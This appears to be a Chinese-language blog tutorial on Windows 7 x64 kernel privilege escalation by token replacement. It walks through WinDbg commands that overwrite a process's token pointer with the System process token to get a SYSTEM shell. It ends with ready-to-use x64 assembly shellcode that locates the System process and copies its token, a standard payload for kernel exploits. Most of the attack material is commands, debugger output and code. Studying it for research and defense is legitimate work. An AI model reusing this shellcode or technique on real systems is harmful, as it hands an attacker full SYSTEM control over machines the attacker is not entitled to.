Token替换提权实验
Token替换是windows内核提权中最常见的操作。
这里来说明一下什么是Token,以及Token替换怎样达到提权的操作。
这里我们先来写一段测试程序,很简单创建了一个cmd进程。
//RunCmd.exe
#include "windows.h"
int main()
{
printf("Before Run cmd ..\n");
getchar();
system("cmd");
return 0;
}
为什么要创建子进程呢,因为我们替换Token后并不能直接看到父进程的所有用户的变化。
但是子进程会继承父进程的Token相关属性,所以如果创建的子进程是是高权限用户,那么就可以代表替换成功。
我们看下这个程序的Token
// win7x64
kd> !process 0 0
...
PROCESS fffffa8002276060
SessionId: 1 Cid: 0274 Peb: 7efdf000 ParentCid: 0838
DirBase: 785ad000 ObjectTable: fffff8a00b5d5530 HandleCount: 12.
Image: RunCmd.exe
kd> dt _EPROCESS fffffa8002276060 -d Token
nt!_EPROCESS
+0x208 Token : _EX_FAST_REF
可以看到Token的偏移是0x208,来看下Token的值
kd> dq fffffa8002276060 + 0x208
fffffa80`02276268 fffff8a0`07d333e8 00000000`00068031
或者
kd> dt _EX_FAST_REF 0xfffffa8002276060 + 0x208
nt!_EX_FAST_REF
+0x000 Object : 0xfffff8a0`07d333e8 Void
+0x000 RefCnt : 0y1000
+0x000 Value : 0xfffff8a0`07d333e8
可以看到:value的值是 0xfffff8a0`07d333e8
需要注意的是:这个数最后四位代表这个token的引用计数
也就是真正的Token指针是: fffff8a0`07d333e0
kd> ? 0xfffff8a0`07d333e8 & ffffffff`fffffff0
Evaluate expression: -8108766972960 = fffff8a0`07d333e0
我们可以看下这个Token的内容:
kd> dt _TOKEN fffff8a0`07d333e0
nt!_TOKEN
+0x000 TokenSource : _TOKEN_SOURCE
+0x010 TokenId : _LUID
+0x018 AuthenticationId : _LUID
+0x020 ParentTokenId : _LUID
+0x028 ExpirationTime : _LARGE_INTEGER 0x7fffffff`ffffffff
+0x030 TokenLock : 0xfffffa80`03054880 _ERESOURCE
+0x038 ModifiedId : _LUID
+0x040 Privileges : _SEP_TOKEN_PRIVILEGES
+0x058 AuditPolicy : _SEP_AUDIT_POLICY
+0x074 SessionId : 1
+0x078 UserAndGroupCount : 0xd
+0x07c RestrictedSidCount : 0
+0x080 VariableLength : 0x264
+0x084 DynamicCharged : 0x400
+0x088 DynamicAvailable : 0
+0x08c DefaultOwnerIndex : 3
+0x090 UserAndGroups : 0xfffff8a0`07d336e8 _SID_AND_ATTRIBUTES
+0x098 RestrictedSids : (null)
+0x0a0 PrimaryGroup : 0xfffff8a0`06ee56c0 Void
+0x0a8 DynamicPart : 0xfffff8a0`06ee56c0 -> 0x501
+0x0b0 DefaultDacl : 0xfffff8a0`06ee56dc _ACL
+0x0b8 TokenType : 1 ( TokenPrimary )
+0x0bc ImpersonationLevel : 0 ( SecurityAnonymous )
+0x0c0 TokenFlags : 0x2000
+0x0c4 TokenInUse : 0x1 ''
+0x0c8 IntegrityLevelIndex : 0xc
+0x0cc MandatoryPolicy : 3
+0x0d0 LogonSession : 0xfffff8a0`01bf4830 _SEP_LOGON_SESSION_REFERENCES
+0x0d8 OriginatingLogonSession : _LUID
+0x0e0 SidHash : _SID_AND_ATTRIBUTES_HASH
+0x1f0 RestrictedSidHash : _SID_AND_ATTRIBUTES_HASH
+0x300 pSecurityAttributes : 0xfffff8a0`02ee5a70 _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
+0x308 VariablePart : 0xfffff8a0`07d337b8
或者:
kd> !token fffff8a0`07d333e0
_TOKEN 0xfffff8a007d333e0
TS Session ID: 0x1
User: S-1-5-21-1071733736-4194771383-3987741639-500
User Groups:
00 S-1-5-21-1071733736-4194771383-3987741639-513
Attributes - Mandatory Default Enabled
01 S-1-1-0
Attributes - Mandatory Default Enabled
02 S-1-5-32-544
Attributes - Mandatory Default Enabled Owner
03 S-1-5-32-545
Attributes - Mandatory Default Enabled
04 S-1-5-4
Attributes - Mandatory Default Enabled
05 S-1-2-1
Attributes - Mandatory Default Enabled
06 S-1-5-11
Attributes - Mandatory Default Enabled
07 S-1-5-15
Attributes - Mandatory Default Enabled
08 S-1-5-5-0-90708
Attributes - Mandatory Default Enabled LogonId
09 S-1-2-0
Attributes - Mandatory Default Enabled
10 S-1-5-64-10
Attributes - Mandatory Default Enabled
11 S-1-16-12288
Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-1071733736-4194771383-3987741639-513
Privs:
05 0x000000005 SeIncreaseQuotaPrivilege Attributes -
08 0x000000008 SeSecurityPrivilege Attributes -
09 0x000000009 SeTakeOwnershipPrivilege Attributes -
10 0x00000000a SeLoadDriverPrivilege Attributes -
11 0x00000000b SeSystemProfilePrivilege Attributes -
12 0x00000000c SeSystemtimePrivilege Attributes -
13 0x00000000d SeProfileSingleProcessPrivilege Attributes -
14 0x00000000e SeIncreaseBasePriorityPrivilege Attributes -
15 0x00000000f SeCreatePagefilePrivilege Attributes -
17 0x000000011 SeBackupPrivilege Attributes -
18 0x000000012 SeRestorePrivilege Attributes -
19 0x000000013 SeShutdownPrivilege Attributes -
20 0x000000014 SeDebugPrivilege Attributes -
22 0x000000016 SeSystemEnvironmentPrivilege Attributes -
23 0x000000017 SeChangeNotifyPrivilege Attributes - Enabled Default
24 0x000000018 SeRemoteShutdownPrivilege Attributes -
25 0x000000019 SeUndockPrivilege Attributes -
28 0x00000001c SeManageVolumePrivilege Attributes -
29 0x00000001d SeImpersonatePrivilege Attributes - Enabled Default
30 0x00000001e SeCreateGlobalPrivilege Attributes - Enabled Default
33 0x000000021 SeIncreaseWorkingSetPrivilege Attributes -
34 0x000000022 SeTimeZonePrivilege Attributes -
35 0x000000023 SeCreateSymbolicLinkPrivilege Attributes -
Authentication ID: (0,162aa)
Impersonation Level: Anonymous
TokenType: Primary
Source: User32 TokenFlags: 0x2000 ( Token in use )
Token ID: b269a9 ParentToken ID: 0
Modified ID: (0, b26710)
RestrictedSidCount: 0 RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7
替换System指针
kd> !process 0 0 System
PROCESS fffffa80018d0090
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 00187000 ObjectTable: fffff8a0000017f0 HandleCount: 487.
Image: System
kd> dq fffffa80018d0090 + 208
fffffa80`018d0298 fffff8a0`00004bb4 00000000`00000000
可以看到System进程的Token指针&引用计数是:fffff8a0`00004bb4
开始替换:
kd> dq fffffa8002276060 + 208
fffffa80`02276268 fffff8a0`07d333e8 00000000`00068031
kd> eq fffffa8002276060 + 208 fffff8a0`00004bb4
kd> dq fffffa8002276060 + 208
fffffa80`02276268 fffff8a0`00004bb4 00000000`00068031
这时候,在RunCmd界面按下enter键,并输入命令:
whoami
成功提权:
顺便附上一段x64下替换token Shellcode:
.CONST
; Windows 7 SP1 x64 Offsets
KTHREAD_OFFSET equ 188h ; nt!_KPCR.PcrbData.CurrentThread
EPROCESS_OFFSET equ 70h ; nt!_KTHREAD.ApcState.Process
SYSTEM_PID equ 04h ; SYSTEM Process PID
FLINK_OFFSET equ 188h ; nt!_EPROCESS.ActiveProcessLinks.Flink
PID_OFFSET equ 180h ; nt!_EPROCESS.UniqueProcessId
TOKEN_OFFSET equ 208h ; nt!_EPROCESS.Token
.CODE
ShellcodeTokenReplace PROC
push rcx
push rdx
xor rax, rax
mov rax, gs:[rax + KTHREAD_OFFSET]
mov rax, [rax + EPROCESS_OFFSET]
mov rcx, rax
mov rdx, SYSTEM_PID
SearchSystemPID:
mov rax, [rax + FLINK_OFFSET]
sub rax, FLINK_OFFSET
cmp [rax + PID_OFFSET], rdx
jne SearchSystemPID
mov rax, [rax + TOKEN_OFFSET]
mov [rcx + TOKEN_OFFSET], rax
pop rdx
pop rcx
ret
ShellcodeTokenReplace ENDP
END
发表评论
要发表评论,您必须先登录。